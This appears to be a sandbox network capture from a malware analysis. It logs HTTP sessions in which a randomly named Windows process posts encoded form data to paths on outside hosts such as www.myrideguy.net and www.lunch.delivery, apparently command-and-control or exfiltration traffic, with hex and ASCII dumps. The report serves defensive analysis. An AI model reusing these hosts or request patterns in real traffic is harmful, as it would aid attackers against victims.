                                                                                                                    Data Raw: 34 35 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 [TRUNCATED]
                                                                                                                    Data Ascii: 4599}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
Oct 24, 2024 05:09:29.234935045 CEST | 1236 | IN | Data Raw: 32 26 7e 5c a0 01 e9 27 31 19 2f c7 fe ca 93 a0 61 10 51 a8 bc d6 33 6b 1a 08 56 eb 69 ef 83 31 49 89 2d 42 a3 d5 34 9f dc 0a 44 cb eb 92 d3 bc af ad c3 73 19 8b ca b9 95 73 fe 31 88 d1 71 90 f8 2e e4 33 72 43 83 24 5a c6 9f c2 d9 6f 2a 6f 9f d8
                                                                                                                    Data Ascii: 2&~\'1/aQ3kVi1I-B4Dss1q.3rC$Zo*oWdSK%S`Q ]=5D:y23qB)KxR3ThtYihBv_^P/jRr>IV-L#VZA-1e
Oct 24, 2024 05:09:29.234961987 CEST | 1236 | IN | Data Raw: 00 cc ff 8b cb f7 af bb da 84 51 98 6a e8 e3 c0 25 bd 1b c2 60 ba e2 e9 1e d3 7e ab cd 14 e4 e3 d3 92 92 cc d3 7e bb 63 41 8c 63 d2 33 3b 86 4b 86 2b 76 27 47 e8 74 36 88 ad d0 95 52 fb b0 2d a6 85 d1 f6 24 08 f8 94 93 39 64 1b 47 11 89 a3 6d c7
                                                                                                                    Data Ascii: Qj%`~~cAc3;K+v'Gt6R-$9dGmFu[1`g<D,s9[$2~Nlkc2=0qzT(7S{8A3v=[eY\Y3)LJc&9*9\,C1-aXjxfi%DD14g]'bh5
                                                                                                                    Oct 24, 2024 05:09:29.234981060 CEST1236INData Raw: 03 37 bb 05 f4 3e df d2 1f 61 77 6d de 6d db e8 b6 3a b5 57 b6 e9 b8 ce a0 80 7c 4c 5d 3f 53 d8 b5 b4 c7 32 ec 8e 59 7b 65 75 da 8d 81 b3 25 b6 88 b2 0d a8 bc d7 96 77 a1 f8 c6 86 d8 66 aa 82 b1 d2 61 46 54 9f 1b 85 4a b8 dc ae cd 37 26 29 47 60
                                                                                                                    Data Ascii: 7>awmm:W|L]?S2Y{eu%wfaFTJ7&)G`4JM?_/R{OT(1/xE|1K|=|U?p<Yro[XvR"Yu*}Ogreq<`czok-8(-6N
                                                                                                                    Oct 24, 2024 05:09:29.235018015 CEST800INData Raw: 8d 03 24 e6 f5 b5 59 47 4a 79 2c e2 ec cc 05 cb 68 ac c7 a1 3a 7e 3e 1f 8f 4a 74 df aa 5c 66 d5 7a 02 26 a5 84 9e 86 47 97 e2 61 e0 63 2f 9b 53 00 8b ea 84 65 2e 8b 88 af 06 e7 b3 90 e2 5b cc a7 a4 b4 32 9f 0f 6f f1 65 9c 2a ed de 5c 55 a8 cd 95
                                                                                                                    Data Ascii: $YGJy,h:~>Jt\fz&Gac/Se.[2oe*\UxU<qZ2V>TW0KO&B*.c~6Lk}uj.Nrl/ IF\8]s=ZE0Z^t:l"h^0*7!^Qei=d
                                                                                                                    Oct 24, 2024 05:09:29.235037088 CEST1236INData Raw: 3b 75 aa 1a f1 b6 76 9e b1 89 61 c4 5c 89 a3 7c 68 dd da e1 a7 be 51 a9 47 e6 41 32 88 9f cb b9 2f 67 cb e3 39 88 9f ce 51 af 56 c8 46 b5 72 21 10 33 8d 36 ff 5a 43 2e bd c9 b7 8c a1 e1 cb 1c 40 47 97 1c c0 57 01 19 24 2c 46 36 1b 22 82 56 59 c5
                                                                                                                    Data Ascii: ;uva\|hQGA2/g9QVFr!36ZC.@GW$,F6"VY,U.;j$Ef2*T|+IBRz&TRqne]Ap+.|k~dQu(OXVJT%x7B1zvfWNJ
                                                                                                                    Oct 24, 2024 05:09:29.235064030 CEST1236INData Raw: 22 84 28 82 29 07 43 97 44 c2 03 95 78 5a 5a 1a ae 79 83 ef 3c 90 58 dc f5 06 49 8a 29 84 0b df 54 11 f2 93 36 90 20 82 5f 9b 69 5d 0b 86 2e b5 86 05 19 96 2e 81 83 bc ea 58 2a 9e 03 01 b9 19 ea 54 aa 39 e1 ec 5e 38 24 2e 86 13 92 5c e9 a9 28 f9
                                                                                                                    Data Ascii: "()CDxZZy<XI)T6 _i]..X*T9^8$.\(O$4OEf)u:H#j/1eg^>`'CV'ZBqzuTCxcUJ>{T}} oTgwFO=l~{d{
                                                                                                                    Oct 24, 2024 05:09:29.235085964 CEST1236INData Raw: 13 62 73 c0 9d 39 07 22 f3 51 f2 fb 82 aa 41 72 6f e9 02 98 39 5a 54 54 21 05 3e 61 de ac 38 a4 2f 5e ba 5a 8b 14 25 c4 62 e5 99 81 53 5d b1 0b c0 f2 c6 4c 5d 89 0b 40 17 1a 31 be 33 c4 9f b0 cb a5 d7 58 06 98 3d 4b c8 5d a3 73 20 55 47 6c 6b 2e
                                                                                                                    Data Ascii: bs9"QAro9ZTT!>a8/^Z%bS]L]@13X=K]s UGlk.Tjve`sqgmJ^5w|3iIeUrTEJ4\L4)59>{[}/{F;7`!+N?($|Dw
                                                                                                                    Oct 24, 2024 05:09:29.235110044 CEST540INData Raw: 90 88 1b dc 3f 45 15 b9 e9 71 78 cb 89 5f 7f 8a 5a 8d a7 3a 76 9c 20 f1 a1 62 67 53 94 7e 3c 5f dd f8 00 cf 73 f5 74 39 fe 47 55 55 59 e3 fe 29 9a 2e 22 ec 86 3a 24 da d6 f6 2e d2 9f 7f 8e 7a 8d 82 10 ea 34 0a c2 3f 45 7d 62 b0 82 e3 c0 a7 d8 83
                                                                                                                    Data Ascii: ?Eqx_Z:v bgS~<_st9GUUY).":$.z4?E}bT>Ct?/Y3NEP~o!\|qa7j4EYZfU1's]];yN=cp(>|a[rKB7zd!rnw5Z
                                                                                                                    Oct 24, 2024 05:09:29.235131025 CEST1236INData Raw: 3b e2 df 06 6a a6 ad d4 4a b3 d3 ef f7 5d de 98 cd c3 6e bd 63 b6 5a 12 4e b4 12 14 37 4c cb ea c2 b7 6d b6 2d d4 aa 37 3a ed 76 e7 14 04 da 68 34 21 bd d1 69 77 40 f6 66 c3 e6 b5 35 6c d3 82 f4 76 07 ca 99 f5 66 d3 4c f1 75 9b 5c 1a 4d 03 e8 b5
                                                                                                                    Data Ascii: ;jJ]ncZN7Lm-7:vh4!iw@f5lvfLu\M-7LQnMowVlvnAid]NJY(|fuF)3bRb?H\;PNO4\zN%u=?{gR@V[cFw*8q
                                                                                                                    Oct 24, 2024 05:09:29.240726948 CEST1236INData Raw: fc 76 0d 15 2e f1 f8 1e bd 16 97 1d cd 41 0a e8 f8 5d 39 5b 9b 00 27 cf 78 be 78 aa e3 ba c5 03 e8 ca 31 de 47 de 8f c1 c9 8d 82 e0 3a 2a 53 e0 89 4f 82 1e ee 7f 28 63 87 b4 39 c8 8b 10 3a bf d8 41 db 7b 39 09 eb 1c 51 44 e2 53 38 30 4a 8e 70 8c
                                                                                                                    Data Ascii: v.A]9['xx1G:*SO(c9:A{9QDS80Jp7z@b^>pOGDP{G0(-Z)"a3QeR}nZCz&Dj |>=fd-SatREC$[Acfi


Session ID: 39 | Source: 192.168.2.4:50041 | Destination: 68.66.226.116:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:09:30.362407923 CEST | 10900 | OUT | POST /kgyd/ HTTP/1.1
                                                                                                                    Host: www.myrideguy.net
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.myrideguy.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.myrideguy.net/kgyd/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 76 70 46 38 58 44 53 64 68 54 4b 4a 39 59 4a 75 46 59 50 63 42 30 48 79 67 2b 6b 68 2b 4d 74 4f 39 46 38 44 36 66 4d 4e 4f 67 55 4d 78 62 79 75 66 52 6d 4e 69 74 4c 45 65 69 47 75 38 72 39 34 34 62 4a 53 66 79 48 74 5a 48 43 33 31 79 32 53 75 31 59 72 53 72 71 54 6e 4f 75 54 70 66 68 6a 43 31 6d 50 36 4e 31 73 4d 36 64 58 58 6c 74 2b 65 34 39 45 2b 7a 65 6b 6d 72 39 44 61 35 31 69 70 35 54 4a 2b 65 4b 6a 50 67 2b 62 65 37 72 30 66 71 64 53 67 74 35 46 4f 4c 39 4e 2f 32 6c 41 72 44 4c 2f 61 53 45 35 41 6a 56 70 73 31 6b 42 51 4d 46 42 57 4c 76 51 61 71 63 59 66 50 68 50 30 75 50 50 41 35 56 6c 30 64 68 6c 4f 6c 68 37 6f 74 71 4a 67 78 31 4f 6e 31 6f 63 61 70 72 44 48 50 6d 54 77 58 59 67 69 2f 4b 73 49 74 67 5a 6c 6b 6d 4f 71 79 76 55 4c 75 74 56 6c 4f 6a 65 48 52 47 75 67 4e 39 30 34 70 44 6a 54 54 73 58 36 61 79 76 69 2b 4a 6c 47 70 63 52 5a 66 76 64 69 66 52 4b 57 78 2f 32 69 63 65 41 47 43 59 66 72 78 5a 71 47 66 78 6e 59 35 74 5a 68 68 2f 67 35 31 [TRUNCATED]
Data Ascii: Qzj=bsfnI4LRERSmvpF8XDSdhTKJ9YJuFYPcB0Hyg+kh+MtO9F8D6fMNOgUMxbyufRmNitLEeiGu8r944bJSfyHtZHC31y2Su1YrSrqTnOuTpfhjC1mP6N1sM6dXXlt+e49E+zekmr9Da51ip5TJ+eKjPg+be7r0fqdSgt5FOL9N/2lArDL/aSE5AjVps1kBQMFBWLvQaqcYfPhP0uPPA5Vl0dhlOlh7otqJgx1On1ocaprDHPmTwXYgi/KsItgZlkmOqyvULutVlOjeHRGugN904pDjTTsX6ayvi+JlGpcRZfvdifRKWx/2iceAGCYfrxZqGfxnY5tZhh/g51 [TRUNCATED]
Oct 24, 2024 05:09:31.780839920 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:31 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                    x-litespeed-tag: b37_HTTP.404
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                    x-litespeed-cache-control: no-cache
                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    transfer-encoding: chunked
                                                                                                                    content-encoding: gzip
                                                                                                                    vary: Accept-Encoding
                                                                                                                    date: Thu, 24 Oct 2024 03:09:31 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    Data Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 [TRUNCATED]
                                                                                                                    Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
                                                                                                                    Oct 24, 2024 05:09:31.780910969 CEST212INData Raw: 32 26 7e 5c a0 01 e9 27 31 19 2f c7 fe ca 93 a0 61 10 51 a8 bc d6 33 6b 1a 08 56 eb 69 ef 83 31 49 89 2d 42 a3 d5 34 9f dc 0a 44 cb eb 92 d3 bc af ad c3 73 19 8b ca b9 95 73 fe 31 88 d1 71 90 f8 2e e4 33 72 43 83 24 5a c6 9f c2 d9 6f 2a 6f 9f d8
                                                                                                                    Data Ascii: 2&~\'1/aQ3kVi1I-B4Dss1q.3rC$Zo*oWdSK%S`Q ]=5D:y23qB)KxR3ThtYihBv_^P/jRr>I
                                                                                                                    Oct 24, 2024 05:09:31.780987978 CEST1236INData Raw: 56 0a 2d 4c a0 0a 23 c2 56 91 5a 41 ad ee ef 7f bb 07 0b b6 2d e8 ee cd 31 be ba be f7 f2 65 6a e6 f6 26 d4 77 83 49 fd 6a e2 60 b4 8b d4 af 7f ff 1b fd eb b7 9d 1c d9 ff 7b f9 f2 8d 47 fd 6b c4 88 b7 fb da f5 23 1d 46 19 12 3b a3 d7 68 c4 c8 60
                                                                                                                    Data Ascii: V-L#VZA-1ej&wIj`{Gk#F;h`v`ObGIc@0D,v;4y`j~sp.G+0Wik^h@KQ##h4NStQL(P%CnHG_""15$a2M
                                                                                                                    Oct 24, 2024 05:09:31.781039000 CEST1236INData Raw: b6 6a b3 78 0a 66 69 25 44 cc 03 44 d6 13 31 34 83 67 5d 86 ec 27 62 68 06 cf ba 0c 35 9e 88 a1 19 3c eb 32 d4 7c 22 86 66 f0 ac cb 50 eb 89 18 9a c1 b3 1e 43 f3 47 de aa b5 1e c1 cc 29 4f 1d 4b b9 57 57 fd 24 8e 03 bf b0 66 35 8d f0 76 67 12 30
                                                                                                                    Data Ascii: jxfi%DD14g]'bh5<2|"fPCG)OKWW$f5vg0Wu:KWW:7wu_GMDFdgLoXt.`zfB;KYXdl3[u+qroY4YHu\pxwA&St?YE
                                                                                                                    Oct 24, 2024 05:09:31.781089067 CEST1236INData Raw: 3c 1a f6 60 63 7a d3 0c 6f 6b ca 9f 2d 9e a5 87 38 1e f5 28 b8 2d 36 9b c6 c6 d6 4e e6 80 02 6f 93 98 02 ea f0 bb b4 58 94 13 eb 9d 3c b6 00 f7 f9 00 49 32 b7 54 e6 2c 4b dd 3c a0 71 aa 67 64 96 e9 74 fa 3c 3b 9a b8 ae 2b ea 01 b3 51 65 7d 26 2b
                                                                                                                    Data Ascii: <`czok-8(-6NoX<I2T,K<qgdt<;+Qe}&+')tEtMQ0|1;koppq=r7#0{+F$B>,)XP$$XZKE"M]_0sQJ%,Ru$WBJJP
                                                                                                                    Oct 24, 2024 05:09:31.781136990 CEST636INData Raw: d5 5e 00 d2 30 2a 85 95 e7 37 21 bf 5e 51 f9 1c a2 65 f4 b2 1a ce 03 69 1b 3d 64 d7 ed ce 02 90 8e d1 43 cd ba d1 aa 00 19 61 37 98 c0 21 a5 38 61 d8 eb 21 08 0c 84 3f dd f0 16 f1 69 b5 51 43 e9 ff eb 56 59 c8 59 69 97 90 b0 87 4c 0b 3c ac f0 57
                                                                                                                    Data Ascii: ^0*7!^Qei=dCa7!8a!?iQCVYYiL<W(W:aJUeRN#5bqptZXa0-./$2hjLg=-Psg"qb..voK;3I5d;aOnrX`3gH)K\0
                                                                                                                    Oct 24, 2024 05:09:31.781188965 CEST1236INData Raw: 10 33 8d 36 ff 5a 43 2e bd c9 b7 8c a1 e1 cb 1c 40 47 97 1c c0 57 01 19 24 2c 46 36 1b 22 82 56 59 c5 ee 2c 83 55 fc 2e 3b 6a 24 7f 45 89 d9 05 e2 96 12 66 32 af 80 ba c4 dd 2a c4 9c 54 cc 92 97 cc c5 b6 f2 83 0b 10 7c 02 2b 8b d2 49 86 42 52 7a
                                                                                                                    Data Ascii: 36ZC.@GW$,F6"VY,U.;j$Ef2*T|+IBRz&TRqne]Ap+.|k~dQu(OXVJT%x7B1zvfWNJQV&)WWpVk0eR1Tu
                                                                                                                    Oct 24, 2024 05:09:31.781239986 CEST1236INData Raw: 86 05 19 96 2e 81 83 bc ea 58 2a 9e 03 01 b9 19 ea 54 aa 39 e1 ec 5e 38 24 2e 86 13 92 5c e9 a9 28 f9 b8 4f 1e 24 fe 34 4f 04 45 85 e4 14 f9 d2 17 82 66 d9 29 75 91 3a f5 07 f0 48 1d d1 23 87 05 9e 87 ea 6a 99 10 0f a9 2f de aa 03 05 c9 9b 31 95
                                                                                                                    Data Ascii: .X*T9^8$.\(O$4OEf)u:H#j/1eg^>`'CV'ZBqzuTCxcUJ>{T}} oTgwFO=l~{d{/&^X}GO'G0$1
                                                                                                                    Oct 24, 2024 05:09:31.781290054 CEST1236INData Raw: c0 f2 c6 4c 5d 89 0b 40 17 1a 31 be 33 c4 9f b0 cb a5 d7 58 06 98 3d 4b c8 5d a3 73 20 55 47 6c 6b 2e 54 c1 f9 6a 76 e7 c2 65 f7 16 80 60 1a 73 a1 9c 11 71 ae d3 67 09 17 d3 cd 6d 4a 5e 95 f9 35 81 77 7c 33 8c 15 d6 69 49 65 15 a8 85 95 55 e0 72
                                                                                                                    Data Ascii: L]@13X=K]s UGlk.Tjve`sqgmJ^5w|3iIeUrTEJ4\L4)59>{[}/{F;7`!+N?($|DwjXKH?/&xf7PTZ-
                                                                                                                    Oct 24, 2024 05:09:31.781342983 CEST1236INData Raw: 9a 2e 22 ec 86 3a 24 da d6 f6 2e d2 9f 7f 8e 7a 8d 82 10 ea 34 0a c2 3f 45 7d 62 b0 82 e3 c0 a7 d8 83 b6 ba 54 3e ff 14 f5 eb 43 74 97 3f dc d6 f6 0e c4 2f 59 ab ed c4 13 7f e5 33 4e e1 45 9a fd 50 7e 8b 9f 6f c0 e7 21 5c 85 7c 8a 99 71 08 61 37
                                                                                                                    Data Ascii: .":$.z4?E}bT>Ct?/Y3NEP~o!\|qa7j4EYZfU1's]];yN=cp(>|a[rKB7zd!rnw5Z)jU@ap`|ecXCn.45iN
                                                                                                                    Oct 24, 2024 05:09:31.786997080 CEST1236INData Raw: 56 df eb 2c ac f1 d2 cd cc a6 a3 db 75 1b 19 7a 0b de a4 d5 5b a8 85 0c 78 6d b5 de 84 6f 64 d6 6d 64 d7 db 9e 6e d7 3b 08 fe 98 75 93 ff b1 eb 1d 48 73 4c 54 ef 20 ab 6e 67 90 e9 bf 36 32 50 4b 07 0c 2d bd 75 61 b6 ea 36 6a 22 20 f7 63 6c f0 45
                                                                                                                    Data Ascii: V,uz[xmodmdn;uHsLT ng62PK-ua6j" clE[&2F[F_(BXj7UNJ't{=/bX[Q^#Z^4M1d8X0%900")a)??sc_tO_.tR1.O


Session ID: 40 | Source: 192.168.2.4:50042 | Destination: 68.66.226.116:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:09:32.907213926 CEST | 532 | OUT | GET /kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc= HTTP/1.1
                                                                                                                    Host: www.myrideguy.net
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:09:33.813411951 CEST | 987 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F%3FZnyl%3D2rnxDB%26Qzj%3DWu3HLPqvQhberYZQa2vA%2BjLd86RSCoLcCB7xsP8R%2F99k0A4wkukwLWUZ%2BZ7OJCWhofveZifw88127MBJWT7MfBvd7RqI%2FEwbWL2cnrCtj%2BZcWXeu3tlvVIc%3D; expires=Thu, 21-Nov-2024 03:09:33 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    x-redirect-by: WordPress
                                                                                                                    location: http://myrideguy.net/kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc=
                                                                                                                    x-litespeed-cache: miss
                                                                                                                    content-length: 0
                                                                                                                    date: Thu, 24 Oct 2024 03:09:33 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-content-type-options: nosniff


Session ID: 41 | Source: 192.168.2.4:50043 | Destination: 13.248.169.48:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:09:38.902848005 CEST | 801 | OUT | POST /qwed/ HTTP/1.1
                                                                                                                    Host: www.lunch.delivery
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.lunch.delivery
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.lunch.delivery/qwed/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 7a 6e 68 54 76 43 79 73 71 2f 31 64 67 68 35 62 74 4b 70 49 4e 57 71 53 63 73 58 6a 57 43 41 37 71 32 6c 78 31 66 73 47 45 4c 31 38 6c 39 6a 4a 56 42 6b 4d 34 4d 50 5a 73 4f 55 36 49 70 48 66 45 61 44 62 72 4f 46 70 6c 52 76 36 52 47 34 57 39 6f 56 36 67 71 67 53 4c 75 54 75 74 5a 6b 39 6e 6a 72 6b 79 30 6d 37 4d 73 67 39 6d 43 30 77 73 35 2f 63 4f 77 39 55 2f 6c 74 68 76 75 38 63 54 44 68 51 4c 6e 39 71 59 70 4d 2b 79 31 45 48 6b 77 61 54 35 2f 6e 2f 48 5a 6c 50 36 64 52 39 35 71 64 69 54 65 45 6c 49 4b 30 53 54 71 32 41 52 54 69 43 63 4f 67 41 63 57 49 34 2b 73 50 30 51 3d 3d
                                                                                                                    Data Ascii: Qzj=6znhTvCysq/1dgh5btKpINWqScsXjWCA7q2lx1fsGEL18l9jJVBkM4MPZsOU6IpHfEaDbrOFplRv6RG4W9oV6gqgSLuTutZk9njrky0m7Msg9mC0ws5/cOw9U/lthvu8cTDhQLn9qYpM+y1EHkwaT5/n/HZlP6dR95qdiTeElIK0STq2ARTiCcOgAcWI4+sP0Q==


Session ID: 42 | Source: 192.168.2.4:50044 | Destination: 13.248.169.48:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:09:41.457381010 CEST | 821 | OUT | POST /qwed/ HTTP/1.1
                                                                                                                    Host: www.lunch.delivery
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.lunch.delivery
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.lunch.delivery/qwed/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 7a 6e 68 54 76 43 79 73 71 2f 31 65 44 70 35 63 4b 65 70 5a 74 57 70 4d 4d 73 58 74 32 43 45 37 74 2b 6c 78 33 7a 47 46 79 62 31 39 46 74 6a 62 6d 5a 6b 42 59 4d 50 53 4d 4f 52 30 6f 70 63 66 45 6e 38 62 70 61 46 70 6c 46 76 36 51 32 34 57 4f 77 55 36 77 71 69 4a 62 75 56 67 4e 5a 6b 39 6e 6a 72 6b 79 67 49 37 50 63 67 39 57 53 30 78 4f 42 38 41 65 77 36 45 66 6c 74 71 50 75 34 63 54 43 45 51 4f 48 58 71 64 74 4d 2b 7a 46 45 48 32 59 62 64 4a 2f 68 37 48 59 35 66 6f 4d 72 36 74 7a 49 74 67 47 39 71 70 37 55 58 56 37 73 52 67 79 31 51 63 71 54 64 62 66 38 31 39 52 47 76 65 70 46 66 2f 66 7a 6c 31 72 71 74 34 79 66 61 5a 4e 50 33 2f 55 3d
